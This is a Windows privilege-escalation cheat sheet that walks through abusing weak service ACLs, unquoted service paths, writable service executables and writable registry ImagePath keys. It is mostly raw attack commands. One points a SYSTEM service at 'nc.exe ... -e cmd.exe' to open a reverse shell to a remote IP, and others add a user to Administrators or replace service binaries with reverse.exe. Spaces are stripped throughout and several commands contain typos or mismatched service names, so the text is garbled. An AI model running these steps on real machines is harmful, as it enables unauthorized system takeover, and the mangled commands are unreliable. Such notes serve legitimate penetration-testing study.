Each service has an ACL which defines certain service-specific permissions. Some permissions are innocuous (e.g. SERVICE_QUERY_CONFIG, SERVICE_QUERY_STATUS). Some may be useful (e.g. SERVICE_STOP, SERVICE_START). Some are dangerous (e.g. SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS)
If our user has permission to change the configuration of a service which runs with SYSTEM privileges, we can change the executable the service uses to one of our own. Potential Rabbit Hole: If you can change a service configuration but cannot stop/start the service, you may not be able to escalate privileges!
#Check the permissions on any Service, given to BOBaccesschk.exe/accepteula–uwcqvyourusernameservicenameaccesschk.exe/accepteula-uwcqvIWAM_BOB*# -u: Suppress errors# -w: Show only objects that have write access# -c: Name is a Windows Service, e.g. ssdpsrv. Specify "*" as the name to show all services and "scmanager" to check the security of the Service Control Manager.
# -q: Omit Banner# -v: Verbose (includes Windows Vista Integrity Level) # Check Service configurationscqcSSDPSRV# Check Service statusscquerySSDPSRV
# Example#Check the permissions given to a particular serviceacesschk.exe-ucqv/accepteulaSSDPSRV#if you see R+W permission to the user, change the bin path and restart the servicescconfigSSDPSRVbinpath="C:\Inetpub\wwwroot\nc.exe -nv 192.168.119.128 1235 -e cmd.exe"scstopSSDPSRVscstartSSDPSRV#if you see the error on retart the service, run the following:scconfigSSDPSRVobj=".\LocalSystem"password=""scconfigSSDPSRVstart="demand"#Check the SSDPSRV service configurationscqcSSDPSRV#Add IWAM_BOB account to the Local Administrator Group to see the Administrator's directory and files.netlocalgroupAdministratorsIWAM_BOB/add#Restart the Services (Attack)scstopSSDPSRVnetstartSSDPSRV
When a Service has an unquoted path that also contains spaces under the Service Path such as 'Common Files' in C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe, you can create a Common.exe and rewrite the Service path as C:\Program Files\Unquoted Path Service\Common.exe
# Enumeration.\winPEASany.exequietservicesinfowmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
#Check the permission for a particular user .\accesschk.exe/accepteula-uwdqC:\.\accesschk.exe /accepteula-uwdq"C:\Program Files\"\accesschk.exe /accepteula -uwdq "C:\ProgramFiles\UnquotedPathService\"# Copy the Service to the directorycopyreverse.exe"C:\Program Files\Unquoted Path Service\Common.exe"#Restart the Service (Attack)scstopSSDPSRVnetstartSSDPSRV
If the original service executable is modifiable by our user, we can simply replace it with our reverse shell executable.
# Enumeration.\winPEASany.exequietservicesinfo# Check permissions, given to the directory .\accesschk.exe/accepteula-quvw"C:\Program Files\File Permissions Service\filepermservice.exe"# Check permissions, given to the service.\accesschk.exe/accepteula-uvqcfilepermsvc# Replace the executablecopy"C:\Program Files\File Permissions Service\filepermservice.exe""C:\temp\"copy "C:\PrivEsc\reverse.exe" "C:\ProgramFiles\FilePermissionsService\filepermservice.exe" # Restart the Service (Attack)sc stop SSDPSRVnet start filepermsvc
# Enumeration.\winPEASany.exequietservicesinfo# Check permissions, given to the registry entry. Look for a user with full controlpowrshellPS> Get-AclHKLM:\System\CurrentControlSet\Services\regsvc|Format-List.\accesschk.exe/accepteula-uvwqkHKLM\System\CurrentControlSet\Services\regsvc#Check the ImagePathregqueryHKLM\System\CurrentControlSet\Services\regsv#Check the permission for users (privilege to start and stop service).\accesschk.exe/accepteula-ucqvuserregsvc# Update the registryregaddHKLM\SYSTEM\CurrentControlSet\services\regsvc/vImagePath/tREG_EXPAND_SZ/dC:\PrivEsc\reverse.exe/f# Restart the Service (Attack)scstopSSDPSRVnetstartregsvc